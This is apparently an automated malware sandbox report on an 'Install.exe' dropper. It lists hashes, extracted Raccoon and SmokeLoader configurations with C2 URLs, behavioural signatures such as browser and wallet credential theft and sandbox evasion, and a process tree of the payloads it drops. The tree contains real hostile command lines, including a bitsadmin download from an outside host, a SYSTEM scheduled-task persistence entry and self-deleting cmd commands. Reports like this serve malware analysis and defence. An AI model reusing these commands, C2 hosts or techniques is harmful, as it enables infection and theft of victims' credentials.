Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1803s
  • max time network
    1756s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 49 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 36 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 35 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 57 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:340
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1424
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2788
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2692
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1960
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1248
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1240
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1092
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          PID:1040
                          • C:\Users\Admin\AppData\Roaming\dvsegwg
                            C:\Users\Admin\AppData\Roaming\dvsegwg
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:4884
                            • C:\Users\Admin\AppData\Roaming\dvsegwg
                              C:\Users\Admin\AppData\Roaming\dvsegwg
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:3412
                          • C:\Users\Admin\AppData\Roaming\dvsegwg
                            C:\Users\Admin\AppData\Roaming\dvsegwg
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5436
                            • C:\Users\Admin\AppData\Roaming\dvsegwg
                              C:\Users\Admin\AppData\Roaming\dvsegwg
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:4340
                          • C:\Users\Admin\AppData\Roaming\dvsegwg
                            C:\Users\Admin\AppData\Roaming\dvsegwg
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:2340
                            • C:\Users\Admin\AppData\Roaming\dvsegwg
                              C:\Users\Admin\AppData\Roaming\dvsegwg
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:1064
                          • C:\Windows\system32\rundll32.exe
                            C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                            2⤵
                            • Windows security modification
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            PID:1188
                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:808
                          • C:\Users\Admin\AppData\Local\Temp\is-ABVG7.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-ABVG7.tmp\Install.tmp" /SL5="$4006C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:2524
                            • C:\Users\Admin\AppData\Local\Temp\is-TLBTS.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-TLBTS.tmp\Ultra.exe" /S /UID=burnerch1
                              3⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2624
                              • C:\Users\Admin\AppData\Local\Temp\TCIFQTPNKG\ultramediaburner.exe
                                "C:\Users\Admin\AppData\Local\Temp\TCIFQTPNKG\ultramediaburner.exe" /VERYSILENT
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:2180
                                • C:\Users\Admin\AppData\Local\Temp\is-VS816.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-VS816.tmp\ultramediaburner.tmp" /SL5="$5002E,281924,62464,C:\Users\Admin\AppData\Local\Temp\TCIFQTPNKG\ultramediaburner.exe" /VERYSILENT
                                  5⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:3788
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3672
                              • C:\Users\Admin\AppData\Local\Temp\57-c3c32-2a9-29ea0-034dbf997de8f\Lymusovaeve.exe
                                "C:\Users\Admin\AppData\Local\Temp\57-c3c32-2a9-29ea0-034dbf997de8f\Lymusovaeve.exe"
                                4⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Modifies system certificate store
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4016
                              • C:\Users\Admin\AppData\Local\Temp\11-db21e-6a1-9df8d-1a3bef7129cc5\Kozhocapeku.exe
                                "C:\Users\Admin\AppData\Local\Temp\11-db21e-6a1-9df8d-1a3bef7129cc5\Kozhocapeku.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1260
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\abw30blk.bym\KiffMainE1.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3716
                                  • C:\Users\Admin\AppData\Local\Temp\abw30blk.bym\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\abw30blk.bym\KiffMainE1.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4244
                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                      dw20.exe -x -s 1348
                                      7⤵
                                        PID:5124
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wnlnbki.1ki\001.exe & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4340
                                    • C:\Users\Admin\AppData\Local\Temp\1wnlnbki.1ki\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\1wnlnbki.1ki\001.exe
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4492
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ekquy5ff.f1w\installer.exe /qn CAMPAIGN="654" & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4548
                                    • C:\Users\Admin\AppData\Local\Temp\ekquy5ff.f1w\installer.exe
                                      C:\Users\Admin\AppData\Local\Temp\ekquy5ff.f1w\installer.exe /qn CAMPAIGN="654"
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      PID:4724
                                      • C:\Windows\SysWOW64\msiexec.exe
                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ekquy5ff.f1w\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ekquy5ff.f1w\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620037987 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                        7⤵
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:4600
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nanyd2wi.suv\gpooe.exe & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4948
                                    • C:\Users\Admin\AppData\Local\Temp\nanyd2wi.suv\gpooe.exe
                                      C:\Users\Admin\AppData\Local\Temp\nanyd2wi.suv\gpooe.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:5084
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5164
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                          PID:4288
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4316
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4276
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i10vkzud.fxn\google-game.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4280
                                      • C:\Users\Admin\AppData\Local\Temp\i10vkzud.fxn\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\i10vkzud.fxn\google-game.exe
                                        6⤵
                                          PID:4716
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                            7⤵
                                              PID:4600
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gqqhdytd.bbh\huesaa.exe & exit
                                          5⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4844
                                          • C:\Users\Admin\AppData\Local\Temp\gqqhdytd.bbh\huesaa.exe
                                            C:\Users\Admin\AppData\Local\Temp\gqqhdytd.bbh\huesaa.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4020
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5100
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5340
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:1812
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:708
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eia4tee4.xh1\askinstall39.exe & exit
                                          5⤵
                                            PID:3624
                                            • C:\Users\Admin\AppData\Local\Temp\eia4tee4.xh1\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\eia4tee4.xh1\askinstall39.exe
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4104
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                7⤵
                                                  PID:5724
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    8⤵
                                                    • Kills process with taskkill
                                                    PID:5900
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2h5p0faf.ce4\setup.exe & exit
                                              5⤵
                                                PID:4392
                                                • C:\Users\Admin\AppData\Local\Temp\2h5p0faf.ce4\setup.exe
                                                  C:\Users\Admin\AppData\Local\Temp\2h5p0faf.ce4\setup.exe
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4272
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2h5p0faf.ce4\setup.exe"
                                                    7⤵
                                                      PID:5948
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 1.1.1.1 -n 1 -w 3000
                                                        8⤵
                                                        • Runs ping.exe
                                                        PID:6140
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dhotkgz.rf3\y1.exe & exit
                                                  5⤵
                                                    PID:5440
                                                    • C:\Users\Admin\AppData\Local\Temp\2dhotkgz.rf3\y1.exe
                                                      C:\Users\Admin\AppData\Local\Temp\2dhotkgz.rf3\y1.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:5668
                                                      • C:\Users\Admin\AppData\Local\Temp\qCyS5aeYEt.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\qCyS5aeYEt.exe"
                                                        7⤵
                                                          PID:5264
                                                          • C:\Users\Admin\AppData\Roaming\1620297388869.exe
                                                            "C:\Users\Admin\AppData\Roaming\1620297388869.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620297388869.txt"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5828
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\qCyS5aeYEt.exe"
                                                            8⤵
                                                              PID:4784
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 3
                                                                9⤵
                                                                • Runs ping.exe
                                                                PID:4920
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2dhotkgz.rf3\y1.exe"
                                                            7⤵
                                                              PID:2060
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /T 10 /NOBREAK
                                                                8⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4288
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cg15gxww.y2d\Setup_v3.exe & exit
                                                          5⤵
                                                            PID:5820
                                                            • C:\Users\Admin\AppData\Local\Temp\cg15gxww.y2d\Setup_v3.exe
                                                              C:\Users\Admin\AppData\Local\Temp\cg15gxww.y2d\Setup_v3.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:6016
                                                              • C:\Windows\SysWOW64\at.exe
                                                                "C:\Windows\System32\at.exe"
                                                                7⤵
                                                                  PID:5320
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                  7⤵
                                                                    PID:2452
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\System32\cmd.exe
                                                                      8⤵
                                                                        PID:6120
                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                          findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                          9⤵
                                                                            PID:4960
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                            Fessura.exe.com Z
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            PID:2724
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                              10⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5724
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                11⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:5980
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                PID:5052
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            9⤵
                                                                            • Runs ping.exe
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3624
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                        7⤵
                                                                        • Blocklisted process makes network request
                                                                        • Executes dropped EXE
                                                                        • Modifies system certificate store
                                                                        PID:5264
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ruhhuklm.lcd\toolspab1.exe & exit
                                                                    5⤵
                                                                      PID:6004
                                                                      • C:\Users\Admin\AppData\Local\Temp\ruhhuklm.lcd\toolspab1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\ruhhuklm.lcd\toolspab1.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5260
                                                                        • C:\Users\Admin\AppData\Local\Temp\ruhhuklm.lcd\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\ruhhuklm.lcd\toolspab1.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:5568
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o3fqecd3.mwg\005.exe & exit
                                                                      5⤵
                                                                        PID:5312
                                                                        • C:\Users\Admin\AppData\Local\Temp\o3fqecd3.mwg\005.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\o3fqecd3.mwg\005.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4760
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iauxnyv4.mt3\SunLabsPlayer.exe /S & exit
                                                                        5⤵
                                                                          PID:5624
                                                                          • C:\Users\Admin\AppData\Local\Temp\iauxnyv4.mt3\SunLabsPlayer.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\iauxnyv4.mt3\SunLabsPlayer.exe /S
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            PID:4212
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5536
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:4624
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:4196
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:5384
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:192
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:5500
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                          • Checks for any installed AV software in registry
                                                                                          PID:1904
                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                          7⤵
                                                                                          • Download via BitsAdmin
                                                                                          PID:4108
                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          PID:6112
                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1520
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:344
